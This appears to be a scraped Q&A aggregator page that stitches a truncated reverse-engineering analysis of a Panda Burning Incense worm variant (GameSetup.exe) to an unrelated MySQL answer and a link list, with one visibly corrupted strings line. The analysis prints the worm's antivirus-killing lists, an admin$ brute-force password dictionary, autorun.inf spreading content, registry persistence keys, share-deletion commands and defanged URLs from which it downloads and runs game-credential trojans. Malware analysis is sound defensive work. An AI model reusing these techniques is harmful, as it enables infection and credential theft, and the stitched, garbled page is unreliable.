導航:首頁 > 可愛圖片 > d0 bixia3

d0 bixia3

發布時間:2024-04-13 05:36:11

㈠ 病毒 滿意定加分

某處下了個所謂的新版本熊貓燒香.
根據字元串結合loveboom的文章進行了深入的學習.

不敢獨享,分享如下.

GameSetup.exe

1.脫殼:
FSG 2.0 -> bart/xt
Borland Delphi 6.0 - 7.0

ep:
00400154 G> 8725 F4D24100 xchg dword ptr ds:[41D2F4],esp
0040015A 61 popad
0040015B 94 xchg eax,esp
0040015C 55 push ebp
0040015D A4 movs byte ptr es:[edi],byte ptr ds:[e>
0040015E B6 80 mov dh,80
00400160 FF13 call dword ptr ds:[ebx]
00400162 ^ 73 F9 jnb short GameSetu.0040015D
...
004001CC 40 inc eax
004001CD ^ 78 F3 js short GameSetu.004001C2
004001CF 75 03 jnz short GameSetu.004001D4
004001D1 - FF63 0C jmp dword ptr ds:[ebx+C] ; GameSetu.0040D278 ,OEP
004001D4 50 push eax
004001D5 55 push ebp
004001D6 FF53 14 call dword ptr ds:[ebx+14]
004001D9 AB stos dword ptr es:[edi]
004001DA ^ EB EE jmp short GameSetu.004001CA

OEP:
0040D278 55 push ebp ; URLMON.702B0000
0040D279 8BEC mov ebp,esp
0040D27B 83C4 E8 add esp,-18
0040D27E 53 push ebx
0040D27F 56 push esi
0040D280 33C0 xor eax,eax
0040D282 8945 E8 mov dword ptr ss:[ebp-18],eax
0040D285 8945 EC mov dword ptr ss:[ebp-14],eax
0040D288 B8 C8D14000 mov eax,GameSetu.0040D1C8
0040D28D E8 5677FFFF call GameSetu.004049E8

文本字元串參考位於 GameSetu:
地址 反匯編 文本字元串
0040626A mov eax,GameSetu.004069D8 ASCII "VirusScan"
00406296 mov eax,GameSetu.004069EC ASCII "NOD32"
004064B0 mov eax,GameSetu.00406AB4 ASCII "Symantec AntiVirus"
004064E2 mov eax,GameSetu.00406AD0 ASCII "Duba"
00406514 mov eax,GameSetu.00406AE0 ASCII "esteem procs"
0040660E mov eax,GameSetu.00406B44 ASCII "System Safety Monitor"
00406640 mov eax,GameSetu.00406B64 ASCII "Wrapped gift Killer"
00406672 mov eax,GameSetu.00406B80 ASCII "Winsock Expert"
0040670E push GameSetu.00406BC0 ASCII "msctls_statusbar32"
00406748 mov eax,GameSetu.00406BDC ASCII "pjf(ustc)"
004067E4 push GameSetu.00406BE8 ASCII "IceSword"
00406826 mov eax,GameSetu.00406BFC ASCII "Mcshield.exe"
00406830 mov eax,GameSetu.00406C14 ASCII "VsTskMgr.exe"
0040683A mov eax,GameSetu.00406C2C ASCII "naPrdMgr.exe"
00406844 mov eax,GameSetu.00406C44 ASCII "UpdaterUI.exe"
0040684E mov eax,GameSetu.00406C5C ASCII "TBMon.exe"
00406858 mov eax,GameSetu.00406C70 ASCII "scan32.exe"
00406862 mov eax,GameSetu.00406C84 ASCII "Ravmond.exe"
0040686C mov eax,GameSetu.00406C98 ASCII "CCenter.exe"
00406876 mov eax,GameSetu.00406CAC ASCII "RavTask.exe"
00406880 mov eax,GameSetu.00406CC0 ASCII "Rav.exe"
0040688A mov eax,GameSetu.00406CD0 ASCII "Ravmon.exe"
00406894 mov eax,GameSetu.00406CE4 ASCII "RavmonD.exe"
0040689E mov eax,GameSetu.00406CF8 ASCII "RavStub.exe"
004068A8 mov eax,GameSetu.00406D0C ASCII "KVXP.kxp"
004068B2 mov eax,GameSetu.00406D20 ASCII "KvMonXP.kxp"
004068BC mov eax,GameSetu.00406D34 ASCII "KVCenter.kxp"
004068C6 mov eax,GameSetu.00406D4C ASCII "KVSrvXP.exe"
004068D0 mov eax,GameSetu.00406D60 ASCII "KRegEx.exe"
004068DA mov eax,GameSetu.00406D74 ASCII "UIHost.exe"
004068E4 mov eax,GameSetu.00406D88 ASCII "TrojDie.kxp"
004068EE mov eax,GameSetu.00406D9C ASCII "FrogAgent.exe"
004068F8 mov eax,GameSetu.00406D0C ASCII "KVXP.kxp"
00406902 mov eax,GameSetu.00406D20 ASCII "KvMonXP.kxp"
0040690C mov eax,GameSetu.00406D34 ASCII "KVCenter.kxp"
00406916 mov eax,GameSetu.00406D4C ASCII "KVSrvXP.exe"
00406920 mov eax,GameSetu.00406D60 ASCII "KRegEx.exe"
0040692A mov eax,GameSetu.00406D74 ASCII "UIHost.exe"
00406934 mov eax,GameSetu.00406D88 ASCII "TrojDie.kxp"
0040693E mov eax,GameSetu.00406D9C ASCII "FrogAgent.exe"
00406948 mov eax,GameSetu.00406DB4 ASCII "Logo1_.exe"
00406952 mov eax,GameSetu.00406DC8 ASCII "Logo_1.exe"
0040695C mov eax,GameSetu.00406DDC ASCII "Rundl132.exe"
00406966 mov eax,GameSetu.00406DF4 ASCII "regedit.exe"
00406970 mov eax,GameSetu.00406E08 ASCII "msconfig.exe"
0040697A mov eax,GameSetu.00406E20 ASCII "taskmgr.exe"
00406E44 mov eax,GameSetu.00407014 ASCII "Schele"
00406E4E mov eax,GameSetu.00407028 ASCII "sharedaccess"
00406E58 mov eax,GameSetu.00407040 ASCII "RsCCenter"
00406E62 mov eax,GameSetu.00407054 ASCII "RsRavMon"
00406E6C mov eax,GameSetu.00407060 ASCII "RsCCenter"
00406E76 mov eax,GameSetu.0040706C ASCII "RsRavMon"
00406E80 mov edx,GameSetu.00407080 ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask"
00406E8F mov eax,GameSetu.004070C0 ASCII "KVWSC"
00406E99 mov eax,GameSetu.004070D0 ASCII "KVSrvXP"
00406EA3 mov eax,GameSetu.004070D8 ASCII "KVWSC"
00406EAD mov eax,GameSetu.004070E0 ASCII "KVSrvXP"
00406EB7 mov edx,GameSetu.004070F0 ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP"
00406EC6 mov eax,GameSetu.00407130 ASCII "kavsvc"
00406ED0 mov eax,GameSetu.00407140 ASCII "AVP"
00406EDA mov eax,GameSetu.00407144 ASCII "AVP"
00406EE4 mov eax,GameSetu.00407148 ASCII "kavsvc"
00406EEE mov edx,GameSetu.00407158 ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav"
00406EFD mov edx,GameSetu.00407194 ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50"
00406F0C mov eax,GameSetu.004071D8 ASCII "McAfeeFramework"
00406F16 mov eax,GameSetu.004071F0 ASCII "McShield"
00406F20 mov eax,GameSetu.00407204 ASCII "McTaskManager"
00406F2A mov eax,GameSetu.00407214 ASCII "McAfeeFramework"
00406F34 mov eax,GameSetu.00407224 ASCII "McShield"
00406F3E mov eax,GameSetu.00407230 ASCII "McTaskManager"
00406F48 mov edx,GameSetu.00407248 ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI"
00406F57 mov edx,GameSetu.00407290 ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Associates Error Reporting Service"
00406F66 mov edx,GameSetu.004072F4 ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShStatEXE"
00406F75 mov eax,GameSetu.0040732C ASCII "navapsvc"
00406F7F mov eax,GameSetu.00407338 ASCII "wscsvc"
00406F89 mov eax,GameSetu.00407340 ASCII "KPfwSvc"
00406F93 mov eax,GameSetu.00407348 ASCII "SNDSrvc"
00406F9D mov eax,GameSetu.00407350 ASCII "ccProxy"
00406FA7 mov eax,GameSetu.00407358 ASCII "ccEvtMgr"
00406FB1 mov eax,GameSetu.00407364 ASCII "ccSetMgr"
00406FBB mov eax,GameSetu.00407370 ASCII "SPBBCSvc"
00406FC5 mov eax,GameSetu.0040737C ASCII "Symantec Core LC"
00406FCF mov eax,GameSetu.00407390 ASCII "NPFMntor"
00406FD9 mov eax,GameSetu.0040739C ASCII "MskService"
00406FE3 mov eax,GameSetu.004073A8 ASCII "FireSvc"
00406FED mov edx,GameSetu.004073B8 ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YLive.exe"
00406FFC mov edx,GameSetu.004073F8 ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse"
004075D5 mov ecx,GameSetu.0040764C ASCII ":\"
004079FF mov edx,GameSetu.00407AF4 ASCII "Search"
00407A04 mov eax,GameSetu.00407B04 ASCII "=nb{end'w{g>ispy>,.ps~*bb?2'gm.12&mmeb|'lwl'swi:&9&#ibmnlwispy>,.ps~*bb?2'gm.12&mmeb|'lwl'swi:&9&#ibmnlwmov dword ptr ss:[ebp-2C],5
0040AA13 B8 F0E04000 mov eax,GameSetu.0040E0F0 ; 注意地址,字元串指針
0040AA18 8945 BC mov dword ptr ss:[ebp-44],eax ; 字元串指針保存
0040AA1B 8D55 B4 lea edx,dword ptr ss:[ebp-4C] ; 循環指針,開始處
0040AA1E 8B45 E0 mov eax,dword ptr ss:[ebp-20]
...
0040AA31 8B45 BC mov eax,dword ptr ss:[ebp-44]
0040AA34 FF30 push dword ptr ds:[eax]
0040AA36 8D45 B8 lea eax,dword ptr ss:[ebp-48] ; 目標1
0040AA39 BA 04000000 mov edx,4
0040AA3E E8 4995FFFF call GameSetu.00403F8C
0040AA43 8B55 B8 mov edx,dword ptr ss:[ebp-48]
0040AA46 8B45 FC mov eax,dword ptr ss:[ebp-4]
0040AA49 E8 7AFDFFFF call GameSetu.0040A7C8
0040AA4E 85C0 test eax,eax
0040AA50 0F84 4E020000 je GameSetu.0040ACA4
0040AA56 6A 00 push 0
0040AA58 8D55 AC lea edx,dword ptr ss:[ebp-54] ; 目標3
0040AA5B 8B45 E0 mov eax,dword ptr ss:[ebp-20]
0040AA5E E8 AD9BFFFF call GameSetu.00404610
...
0040AA6E 8B45 BC mov eax,dword ptr ss:[ebp-44]
0040AA71 FF30 push dword ptr ds:[eax]
0040AA73 68 64AD4000 push GameSetu.0040AD64 ; ASCII "GameSetup.exe"
0040AA78 8D45 B0 lea eax,dword ptr ss:[ebp-50] ; 目標2
0040AA7B BA 05000000 mov edx,5
0040AA80 E8 0795FFFF call GameSetu.00403F8C
0040AA85 8B45 B0 mov eax,dword ptr ss:[ebp-50]
0040AA88 E8 3F96FFFF call GameSetu.004040CC
...
0040AA99 68 7CAD4000 push GameSetu.0040AD7C ; ASCII "drivers\"
0040AA9E 68 90AD4000 push GameSetu.0040AD90 ; ASCII "spo0lsv.exe"
0040AAB9 E8 2EA0FFFF call GameSetu.00404AEC ; jmp to KERNEL32.CopyFileA
...
0040AB80 E8 83FAFFFF call GameSetu.0040A608 ; jmp to netapi32.NetRemoteTOD
0040AC07 E8 F4F9FFFF call GameSetu.0040A600 ; jmp to netapi32.NetScheleJobAdd
...
0040AC6B B8 A4AD4000 mov eax,GameSetu.0040ADA4 ; ASCII "admin$"
0040AC70 E8 4BA4FFFF call GameSetu.004050C0
0040AC75 84C0 test al,al
0040AC77 75 2B jnz short GameSetu.0040ACA4
...
0040ACA4 8345 BC 04 add dword ptr ss:[ebp-44],4
0040ACA8 FF4D D4 dec dword ptr ss:[ebp-2C]
0040ACAB ^ 0F85 6AFDFFFF jnz GameSetu.0040AA1B ;
dd 0040E0F0
0040E0F0 0040A828 GameSetu.0040A828 ; 以下為攻擊目標
0040E0F4 0040A834 ASCII "\Documents and Settings\All Users\Start Menu\Programs\Startup\"
0040E0F8 0040A87C GameSetu.0040A87C
0040E0FC 0040A8C0 ASCII "\WINDOWS\Start Menu\Programs\Startup\"
0040E100 0040A8F0 ASCII "\WINNT\Profiles\All Users\Start Menu\Programs\Startup\"
0040E104 00000000
0040E108 0040ADB4 ASCII "1234" ; 以下為字典密碼
0040E10C 0040ADC4 ASCII "password"
0040E110 0040ADD8 ASCII "6969"
0040E114 0040ADE8 ASCII "harley"
0040E118 0040ADF8 ASCII "123456"
0040E11C 0040AE08 ASCII "golf"
0040E120 0040AE18 ASCII "pussy"
0040E124 0040AE28 ASCII "mustang"
0040E128 0040AE38 ASCII "1111"
0040E12C 0040AE48 ASCII "shadow"
0040E130 0040AE58 ASCII "1313"
0040E134 0040AE68 ASCII "fish"
0040E138 0040AE78 ASCII "5150"
0040E13C 0040AE88 ASCII "7777"
0040E140 0040AE98 ASCII "qwerty"
0040E144 0040AEA8 ASCII "baseball"
0040E148 0040AEBC ASCII "2112"
0040E14C 0040AECC ASCII "letmein"
0040E150 0040AEDC ASCII "12345678"
0040E154 0040AEF0 ASCII "12345"
0040E158 0040AF00 ASCII "ccc"
0040E15C 0040AF0C ASCII "admin"
0040E160 0040AF1C ASCII "5201314"
0040E164 0040AF2C ASCII "qq520"
0040E168 0040AF3C GameSetu.0040AF3C
0040E16C 0040AF48 ASCII "12"
0040E170 0040AF54 ASCII "123"
0040E174 0040AF60 ASCII "1234567"
0040E178 0040AF70 ASCII "123456789"
0040E17C 0040AF84 ASCII "654321"
0040E180 0040AF94 ASCII "54321"
0040E184 0040AFA4 ASCII "111"
0040E188 0040AFB0 ASCII "000000"
0040E18C 0040AFC0 ASCII "abc"
0040E190 0040AFCC ASCII "pw"
0040E194 0040AFD8 ASCII "11111111"
0040E198 0040AFEC ASCII "88888888"
0040E19C 0040B000 ASCII "pass"
0040E1A0 0040B010 ASCII "passwd"
0040E1A4 0040B020 ASCII "database"
0040E1A8 0040B034 ASCII "abcd"
0040E1AC 0040B044 ASCII "abc123"
0040E1B0 0040B000 ASCII "pass"
0040E1B4 0040B054 ASCII "sybase"
0040E1B8 0040B064 ASCII "123qwe"
0040E1BC 0040B074 ASCII "server"
0040E1C0 0040B084 ASCII "computer"
0040E1C4 0040B098 ASCII "520"
0040E1C8 0040B0A4 ASCII "super"
0040E1CC 0040B0B4 ASCII "123asd"
0040E1D0 0040B0C4 GameSetu.0040B0C4
0040E1D4 0040B0D0 ASCII "ihavenopass"
0040E1D8 0040B0E4 ASCII "godblessyou"
0040E1DC 0040B0F8 ASCII "enable"
0040E1E0 0040B108 ASCII "xp"
0040E1E4 0040B114 ASCII "2002"
0040E1E8 0040B124 ASCII "2003"
0040E1EC 0040B134 ASCII "2600"
0040E1F0 0040B144 ASCII "alpha"
0040E1F4 0040B154 ASCII "110"
0040E1F8 0040B160 ASCII "111111"
0040E1FC 0040B170 ASCII "121212"
0040E200 0040B180 ASCII "123123"
0040E204 0040B190 ASCII "1234qwer"
0040E208 0040B1A4 ASCII "123abc"
0040E20C 0040B1B4 ASCII "007"
0040E210 0040B1C0 GameSetu.0040B1C0
0040E214 0040B1CC ASCII "aaa"
0040E218 0040B1D8 ASCII "patrick"
0040E21C 0040B1E8 ASCII "pat"
0040E220 0040B1F4 ASCII "administrator"
0040E224 0040B20C ASCII "root"
0040E228 0040B21C ASCII "sex"
0040E22C 0040B228 ASCII "god"
0040E230 0040B234 ASCII "*you"
0040E234 0040B244 ASCII "*"
0040E238 0040AFC0 ASCII "abc"
0040E23C 0040B254 ASCII "test"
0040E240 0040B264 ASCII "test123"
0040E244 0040B274 ASCII "temp"
0040E248 0040B284 ASCII "temp123"
0040E24C 0040B294 ASCII "win"
0040E250 0040B2A0 ASCII "pc"
0040E254 0040B2AC ASCII "asdf"
0040E258 0040B2BC ASCII "pwd"
0040E25C 0040B2C8 ASCII "qwer"
0040E260 0040B2D8 ASCII "yxcv"
0040E264 0040B2E8 ASCII "zxcv"
0040E268 0040B2F8 ASCII "home"
0040E26C 0040B308 ASCII "xxx"
0040E270 0040B314 ASCII "owner"
0040E274 0040B324 ASCII "login"
0040E278 0040B334 ASCII "Login"
0040E27C 0040B344 ASCII "pw123"
0040E280 0040B354 ASCII "love"
0040E284 0040B364 ASCII "mypc"
0040E288 0040B374 ASCII "mypc123"
0040E28C 0040B384 ASCII "admin123"
0040E290 0040B398 ASCII "mypass"
0040E294 0040B3A8 ASCII "mypass123"
0040E298 0040B3BC ASCII "901100"
0040E29C 0040B3CC ASCII "Administrator"
0040E2A0 0040B3E4 ASCII "Guest"
0040E2A4 0040B3F4 ASCII "admin"
0040E2A8 0040B404 ASCII "Root"

2.9 復制病毒到根目錄,生成autorun.inf:
病毒建立一個計時器以,6秒為周期在磁碟的根目錄下生成setup.exe,
並利用AutoRun Open關聯,使病毒在用戶點擊被感染磁碟時能被自動運行.

0040C374 68 7CBE4000 push GameSetu.0040BE7C ; 執行主體
0040C379 68 70170000 push 1770 ; 時間6000ms
0040C37E 6A 00 push 0
0040C380 6A 00 push 0
0040C382 E8 BD88FFFF call GameSetu.00404C44 ; jmp to user32.SetTimer

將病毒復制到各分區下命名為setup.exe,建立autorun.inf:
0040BEC6 E8 BDFDFFFF call GameSetu.0040BC88
0040BCCC E8 7B8EFFFF call GameSetu.00404B4C ; jmp to KERNEL32.GetDriveTypeA
0040BF9F B9 F4C24000 mov ecx,GameSetu.0040C2F4 ; ASCII ":\setup.exe"
0040BFC4 B9 08C34000 mov ecx,GameSetu.0040C308 ; ASCII ":\autorun.inf"
0040C08A E8 5D8AFFFF call GameSetu.00404AEC ; jmp to KERNEL32.CopyFileA
0040C11D BA 20C34000 mov edx,GameSetu.0040C320 ; ASCII "[AutoRun]

[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell\Auto\command=setup.exe

2.10 下載其他病毒盜取QQ:
病毒會以xx分鍾為周期嘗試讀取特定網站上的下載文件列表,
比如:"hxxp://www.ac86.cn/66/up.txt",hxxp://update.whboy.net/worm.txt
並根據文件列表指定的文件下載,並啟動這些程序.

2.10.1 Timer=20min
0040D0A9 A3 B0E24000 mov dword ptr ds:[40E2B0],eax
0040D0AE 68 40D04000 push GameSetu.0040D040 ; 執行地址
0040D0B3 68 804F1200 push 124F80 ; 時間
0040D0B8 6A 00 push 0
0040D0BA 6A 00 push 0
0040D0BC E8 837BFFFF call

0040D040 E8 EFFBFFFF call GameSetu.0040CC34
0040D045 C3 retn

0040CC34 51 push ecx
0040CC35 54 push esp
0040CC36 6A 00 push 0
0040CC38 6A 00 push 0
0040CC3A 68 B0C94000 push GameSetu.0040C9B0 ; 執行主體
0040CC3F 6A 00 push 0
0040CC41 6A 00 push 0
0040CC43 E8 B47EFFFF call GameSetu.00404AFC ; jmp to KERNEL32.CreateThread
0040CC48 5A pop edx
0040CC49 C3 retn

0040C9E2 B8 FCCB4000 mov eax,GameSetu.0040CBFC ; 加密過的字元串
0040C9E7 E8 00FBFFFF call GameSetu.0040C4EC ; 解密
堆棧 ss:[0012FFB0]=00CC0068, (ASCII "hxxp://www.ac86.cn/66/up.txt")
0040C9FF BA 24CC4000 mov edx,GameSetu.0040CC24 ; ASCII "QQ"
0040CABA E8 25FAFFFF call GameSetu.0040C4E4 ; jmp to URLMON.URLDownloadToFileA
0040CAFC E8 D380FFFF call GameSetu.00404BD4 ; jmp to KERNEL32.WinExec

下載下來後發現都是游戲的木馬:
hxxp://www.kosha.com/down/mh.exe
hxxp://www.kosha.com/down/rx.exe // 熱血
hxxp://www.kosha.com/down/my.exe // 魔域
hxxp://www.kosha.com/down/dh.exe
hxxp://www.kosha.com/down/cs.exe // CS
hxxp://www.kosha.com/down/zt.exe // 征途

2.10.2 Timer=30min
0040D104 68 28C74000 push GameSetu.0040C728 ; 執行主體
0040D109 68 40771B00 push 1B7740 ; 時間
0040D10E 6A 00 push 0
0040D110 6A 00 push 0
0040D112 E8 2D7BFFFF call GameSetu.00404C44 ; jmp to user32.SetTimer

0040C75A B8 74C94000 mov eax,GameSetu.0040C974 ; 加密過的字元串
0040C75F E8 88FDFFFF call GameSetu.0040C4EC ; 解密
堆棧 ss:[0012FFB0]=00CC0094, (ASCII "hxxp://update.whboy.net/worm.txt")
0040C777 BA A0C94000 mov edx,GameSetu.0040C9A0 ; ASCII "QQ"
0040C832 E8 ADFCFFFF call GameSetu.0040C4E4 ; jmp to URLMON.URLDownloadToFileA
0040C874 E8 5B83FFFF call GameSetu.00404BD4 ; jmp to KERNEL32.WinExec

這個txt沒能下載下來.
2.11 關閉中毒機器默認共享:
據loveboom分析只是為了避免病毒重復工作.

關閉:cmd.exe /c net share 驅動器名$ /del /y
0040CE07 E8 98A7FFFF call GameSetu.004075A4
004075E8 E8 5FD5FFFF call GameSetu.00404B4C ; jmp to KERNEL32.GetDriveTypeA
0040CE1D 68 94CE4000 push GameSetu.0040CE94 ; ASCII "cmd.exe /c net share "
0040CE34 68 B4CE4000 push GameSetu.0040CEB4 ; ASCII "$ /del /y"
0040CE4E 50 push eax
0040CE4F E8 807DFFFF call GameSetu.00404BD4 ; jmp to KERNEL32.WinExec

關閉:cmd.exe /c net share admin$ /del /y
0040CE5B 68 C0CE4000 push GameSetu.0040CEC0 ; ASCII "cmd.exe /c net share admin$ /del /y"
0040CE60 E8 6F7DFFFF call GameSetu.00404BD4 ; jmp to KERNEL32.WinExec

2.12 修改注冊表隱藏病毒
將以1秒鍾為周期不斷設置如下鍵值:
HKEY_CURRENT_USER
"Software\Microsoft\Windows\CurrentVersion\Run"
svcshare=%病毒文件路徑%

HKEY_LOCAL_MACHINE
"SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"
CheckedValue=0

設置時間:
0040D096 68 E4CE4000 push GameSetu.0040CEE4 ; 要執行的目標
0040D09B 68 E8030000 push 3E8 ; 1000ms
0040D0A0 6A 00 push 0
0040D0A2 6A 00 push 0
0040D0A4 E8 9B7BFFFF call

執行目標:
0040CF09 68 7CCF4000 push GameSetu.0040CF7C ; ASCII "drivers\"
0040CF0E 68 90CF4000 push GameSetu.0040CF90 ; ASCII "spo0lsv.exe"
0040CF13 8D45 FC lea eax,dword ptr ss:[ebp-4]
0040CF16 BA 03000000 mov edx,3
0040CF1B E8 6C70FFFF call GameSetu.00403F8C
0040CF20 8B45 FC mov eax,dword ptr ss:[ebp-4]
0040CF23 E8 A471FFFF call GameSetu.004040CC
0040CF28 50 push eax
0040CF29 B9 9CCF4000 mov ecx,GameSetu.0040CF9C ; ASCII "svcshare"
0040CF2E BA A8CF4000 mov edx,GameSetu.0040CFA8 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
0040CF33 B8 01000080 mov eax,80000001
0040CF38 E8 7F82FFFF call GameSetu.004051BC
0040CF3D 33C9 xor ecx,ecx
0040CF3F BA E0CF4000 mov edx,GameSetu.0040CFE0 ; ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"
0040CF44 B8 02000080 mov eax,80000002
0040CF49 E8 A28AFFFF call GameSetu.004059F0

3.按代碼流程分析:
整體流程:
先比較2個字元串,不同就退出:
0040D5D6 BA 90D84000 mov edx,GameSetu.0040D890 ; ASCII "xboy"
0040D600 BA CCD84000 mov edx,GameSetu.0040D8CC ; ASCII "whboy"

然後拷貝病毒,感染文件並反殺毒及下載其他病毒:
0040D627 E8 70ABFFFF call GameSetu.0040819C ; 模塊1-拷貝病毒
0040D62C E8 5BFBFFFF call GameSetu.0040D18C ; 模塊2-感染文件
0040D631 E8 52FAFFFF call GameSetu.0040D088 ; 模塊3-清除反病毒並下載其他病毒

3.1 模塊1-拷貝病毒:
0040D627 E8 70ABFFFF call GameSetu.0040819C ; 模塊1-拷貝病毒

是否存在Desktop_.ini,存在就設置為normal然後刪除:
004081E1 BA 98874000 mov edx,GameSetu.00408798 ; ASCII "Desktop_.ini"
...
0040823D E8 72C9FFFF call GameSetu.00404BB4 ; jmp to KERNEL32.SetFileAttributesA
...
00408283 E8 7CC8FFFF call GameSetu.00404B04 ; jmp to KERNEL32.DeleteFileA

判斷是否感染過:
004082DF 8B45 FC mov eax,dword ptr ss:[ebp-4]
004082E2 807C18 FF 00 cmp byte ptr ds:[eax+ebx-1],0 ; 文件尾是否為0?
004082E7 ^ 75 CE jnz short GameSetu.004082B7 ; 判斷感染前還是感染後
004082E9 837D F8 00 cmp dword ptr ss:[ebp-8],0 ; 感染標志
004082ED 0F85 6B010000 jnz GameSetu.0040845E

如果未感染,那麼拷貝病毒.參看2.5.

3.2 模塊2-感染文件:
0040D62C E8 5BFBFFFF call GameSetu.0040D18C ; 模塊2-感染文件

0040D18C E8 1FD4FFFF call GameSetu.0040A5B0 ; 創建線程感染文件,參看2.6&2.7
0040D191 E8 DEF1FFFF call GameSetu.0040C374 ; 寫Autorun.inf,參看2.9
0040D196 66:B8 0A00 mov ax,0A
0040D19A E8 2DE9FFFF call GameSetu.0040BACC ; 感染網路,參看2.8
0040D19F C3 retn

3.3 模塊3-清除反病毒並下載其他病毒
0040D631 E8 52FAFFFF call GameSetu.0040D088 ; 模塊3-清除反病毒並下載其他病毒

設置病毒自啟動並修改隱藏標志,參看2.12;
=============

還有好多,字數限制。

全部內容看http://hi..com/liangniu007/
參考資料:http://hi..com/liangniu007/

㈡ '\xBF' '\xD0 ' '\xD3 ' 是什麼 mysql

十六進制數據。

閱讀全文

與d0 bixia3相關的資料

熱點內容
可愛哆啦高清圖片 瀏覽:214
雙馬尾編發型圖片 瀏覽:708
古裝動漫圖片大全唯美 瀏覽:789
如何復制圖片中的一部分文字 瀏覽:181
骨灰盒圖片及價格 瀏覽:497
稻花香15年圖片價格 瀏覽:881
手機如何把圖片放在文字下面 瀏覽:451
小男生的肌肌圖片 瀏覽:464
沒有衣服穿圖片 瀏覽:882
一個人的動漫傷感圖片 瀏覽:466
ps如何將一張圖片合成到另一張 瀏覽:266
定位燙發型圖片男 瀏覽:785
送別圖片加文字 瀏覽:607
如何用ps將圖片加出一塊空白 瀏覽:254
樹葉品種名稱圖片大全 瀏覽:26
斜劉海男短發發型圖片 瀏覽:220
動漫創意圖片 瀏覽:254
最美的微信圖片大全 瀏覽:296
小女孩突然肚子疼圖片 瀏覽:955
黑魔導女孩去掉衣服的圖片 瀏覽:281